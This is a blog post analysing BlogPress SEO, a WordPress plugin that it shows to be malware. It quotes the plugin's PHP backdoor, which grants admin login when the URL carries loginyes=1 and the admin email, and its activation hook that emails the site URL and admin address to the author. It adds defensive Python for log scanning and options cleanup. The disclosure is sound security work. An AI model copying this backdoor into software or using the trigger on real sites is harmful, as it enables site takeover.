BlogPress SEO is Malware

As with most scamming attempts, it all started with an email—which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks—yeah right. I do not use SEO enhancement plugins (other than Google XML sitemaps), and never plan on doing so. Anyways, the sender’s name was Saurabh, and his message was as follows:

Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100’s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. http://BlogPressSEO.com Why backlinks are important for getting traffic. http://BlogPressSEO.com/#1 This is how the plugin works http://BlogPressSEO.com/#2 Thanks


Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So, I downloaded it, and did not like what I saw. Not only are there malicious components, there are several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of stylistic issues:

  • Did not use a unique prefix on function names to avoid collisions with other plugins and themes. Function names include fun_serverpath, SureRemoveDir, fun_create_menu_wplink, wplink_activate, cleansee, etc. While it looks like fun_ is the prefix the author intended, fun is too common a word for a prefix and is used to denote that a quantity is a function in some programming styles. Plus there is a ton of inconsistency between the function names.
  • Saves its settings across several options entries. While this is no longer a great performance issue, thanks to autoloading, it still clutters the wp_options table and does slow down every page load by a little bit. At least the author seems to use hwe_ as the option prefix for most of the options it creates; too bad this was not done for the functions.
  • Performs manual SQL queries through mysql_query() rather than the $wpdb object, bypassing WordPress’s database abstraction and its escaping helpers.

Analysis of the code is a little frightening. Look at this block of code:

//if loginyes and emial then login
if($loginyes==1  && $email==get_option('admin_email'))
{
	global $wpdb;
	$tabname=$wpdb->prefix."users";
	$find_admin_sql="select * from $tabname where user_login='admin'";
	$find_sql=mysql_query($find_admin_sql);
	$user_numrow=mysql_num_rows($find_sql);
	if($user_numrow!=0)
	{
		$user_login='admin';			
	}
	if($user_numrow==0)
	{
		$find_ana_admin_sql="select * from $tabname";
		$find_sql_res=mysql_query($find_ana_admin_sql);
		while($row_find=mysql_fetch_array($find_sql_res))
		{
			$userid=$row_find['ID'];
			$user_login_find=$row_find['user_login'];
			$level=get_usermeta( $userid,'wp_user_level'); 
			if($level==10)
			{
				$user_login=$user_login_find;
				break;
			}
		}
	}		
	$user=new WP_User(0, $user_login); 
	$user_pass = md5($user->user_pass);		 
	wp_login($user_login, $user_pass, true);		 
	wp_setcookie($user_login, $user_pass, true);         
	wp_set_current_user($user_id, $user_login);
	$radirect=get_option('home')."/wp-admin";	
	echo "<script language='javascript'>";
	echo "location.replace('$radirect')";
	echo "</script>";
}

Well, looks like a backdoor, right? Knowing that $loginyes and $email are populated from the $_GET superglobal is even more worrying. Just append ?loginyes=1&email=<admin email> to any URL on a site running this code and you are logged in as an administrator: if a user named admin exists it uses that account, otherwise it walks the users table and picks the first account with user level 10. All you need to know is the site’s admin email address, the value stored in the admin_email option. Now, who would have that information?
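Because the backdoor is triggered by two GET parameters on any URL, an attempt to use it leaves a trace in ordinary web server access logs. The following is an added example, not code from the original post or from the plugin: it scans Apache/nginx combined-format log lines for requests carrying loginyes=1 together with an email parameter, and, when you pass the site’s real admin address, separates attempts that would actually have logged the caller in from failed probes. The log lines, IP addresses and email addresses in it are constructed for the example.

```python
"""Flag requests that trigger the BlogPress SEO login backdoor in access logs.

Added example; not code from the original post or from the plugin.  The
backdoor fires on any URL carrying loginyes=1 plus an email= parameter, so
the trigger is visible in combined-format access logs.  The sample log lines
below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format: ip ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) '
)


def backdoor_params(target):
    """Return the email value if the request target carries the trigger, else None.

    Any value of email= counts: the plugin only logs the caller in when it
    equals the admin_email option, but a failed probe still shows someone knew
    about the backdoor.
    """
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if qs.get("loginyes", [""])[0] != "1" or "email" not in qs:
        return None
    return qs["email"][0]


def find_backdoor_hits(lines, admin_email=None):
    """Return one dict per triggering request (ip, time, email, status, would_succeed)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        email = backdoor_params(m.group("target"))
        if email is None:
            continue
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "email": email,
            "status": int(m.group("status")),
            # Only a request carrying the stored admin email actually logs in.
            "would_succeed": admin_email is not None and email == admin_email,
        })
    return hits


# Constructed sample log (example.com, owner@example.com and the IPs are made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Feb/2011:14:02:11 -0600] "GET /?loginyes=1&email=owner%40example.com HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Feb/2011:14:05:42 -0600] "GET /2011/02/some-post/ HTTP/1.1" 200 18320 "-" "Mozilla/5.0"',
    # The JavaScript redirect in the backdoor shows up as a separate request to wp-admin.
    '203.0.113.7 - - [10/Feb/2011:14:06:00 -0600] "GET /wp-admin/ HTTP/1.1" 200 52211 "http://example.com/?loginyes=1&email=owner%40example.com" "Mozilla/5.0"',
    '192.0.2.55 - - [11/Feb/2011:02:13:19 -0600] "GET /index.php?email=test%40example.com&loginyes=1 HTTP/1.1" 200 412 "-" "curl/7.21.0"',
    '192.0.2.55 - - [11/Feb/2011:02:13:40 -0600] "GET /?loginyes=0&email=test%40example.com HTTP/1.1" 200 18320 "-" "curl/7.21.0"',
    '198.51.100.77 - - [11/Feb/2011:09:41:03 -0600] "GET /?loginyes=1&email= HTTP/1.1" 200 18320 "-" "python-requests/0.8"',
]

if __name__ == "__main__":
    for hit in find_backdoor_hits(SAMPLE_LOG, admin_email="owner@example.com"):
        verdict = "LOGIN" if hit["would_succeed"] else "probe"
        print(f'{hit["time"]} {hit["ip"]} email={hit["email"]!r} -> {verdict}')
```

Run it against your real log with the site’s admin address to see whether the backdoor was ever exercised; parameter order and URL encoding do not matter because the query string is parsed rather than pattern-matched. A hit from the plugin author’s side is just as interesting as one from anyone else, since the activation email gave them both the site URL and the admin address.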

function email_send_fun()
{
	$headers="From:".get_option('admin_email')."\n";
	$headers.="Reply-to:".get_option('admin_email')."\n";
	$sub="BlogPressSeo new installation.";
	$mes=get_option('siteurl');
	$to="info@blogpressseo.com";	
	mail($to,$sub,$mes,$headers);
	$hwe_blogidd=get_option("hwe_blogid");
	
	update_option("hwe_saveradio_option",3);
	update_option("hwe_linkplacement",3);
	
	if($hwe_blogidd)
	{
		wplink_activate();
	}
}

Oh, right, that would be whoever reads info@blogpressseo.com. The From and Reply-to headers carry the site’s admin email address and the message body carries the site URL, which is everything needed to use the backdoor above. This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!. This function runs every time the plugin is activated.

If you have installed this plugin, delete it immediately. Then change your admin email address (under Settings > General, look for the option E-mail address), since the old one has already been mailed to the plugin’s author. It is also worth searching your web server access logs for requests containing loginyes=1 to see whether the backdoor was ever used. Finally, you’ll have to manually clean up your wp_options table, as the author did not provide an uninstall method.
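The cleanup step in practice, as an added example that is not code from the original post or from the plugin: list the hwe_-prefixed rows left in wp_options, review them, then delete them. The statements are written for the wp_options layout and are run here against an in-memory SQLite stand-in with constructed rows so the example runs offline; against a live site run the same two statements through your MySQL client. The table contents, option values and the example.com addresses are constructed. Since the post notes the prefix is used for “most” of the plugin’s options, look at the SELECT output before running the DELETE.

```python
"""List and remove the options BlogPress SEO leaves behind in wp_options.

Added example; not code from the original post or from the plugin.  Runs the
cleanup queries against an in-memory SQLite stand-in for wp_options with
constructed rows; the same statements work in MySQL.
"""
import sqlite3

# Option names that appear in the plugin code quoted in the post.
KNOWN_OPTIONS = ("hwe_blogid", "hwe_saveradio_option", "hwe_linkplacement")

# In LIKE, "_" is a single-character wildcard, so 'hwe_%' would also match
# e.g. "hwexfoo".  Escaping the underscore restricts the match to the prefix.
# "!" is used as the escape character because it is valid in both SQLite and MySQL.
SELECT_SQL = "SELECT option_name FROM wp_options WHERE option_name LIKE 'hwe!_%' ESCAPE '!'"
DELETE_SQL = "DELETE FROM wp_options WHERE option_name LIKE 'hwe!_%' ESCAPE '!'"


def leftover_options(conn):
    """Return the option names matching the plugin's prefix, sorted."""
    return sorted(row[0] for row in conn.execute(SELECT_SQL))


def remove_leftover_options(conn):
    """Delete the prefixed options and return how many rows were removed."""
    cur = conn.execute(DELETE_SQL)
    conn.commit()
    return cur.rowcount


def build_sample_db():
    """Constructed wp_options table: plugin leftovers mixed with core options."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_options ("
        "option_id INTEGER PRIMARY KEY, option_name TEXT UNIQUE, "
        "option_value TEXT, autoload TEXT)"
    )
    rows = [(name, "3", "yes") for name in KNOWN_OPTIONS] + [
        ("siteurl", "http://example.com", "yes"),
        ("admin_email", "owner@example.com", "yes"),
        ("hwexfoo", "unrelated option", "yes"),  # matches an unescaped 'hwe_%'
    ]
    conn.executemany(
        "INSERT INTO wp_options (option_name, option_value, autoload) VALUES (?, ?, ?)",
        rows,
    )
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    print("leftovers:", leftover_options(db))      # review this list first
    print("deleted:", remove_leftover_options(db))
    print("remaining:", [r[0] for r in db.execute("SELECT option_name FROM wp_options")])
```

The unrelated hwexfoo row is there to show why the underscore is escaped: without the ESCAPE clause the pattern would quietly delete it too.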

Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath”.

-John Havlik

[end of transmission, stay tuned]
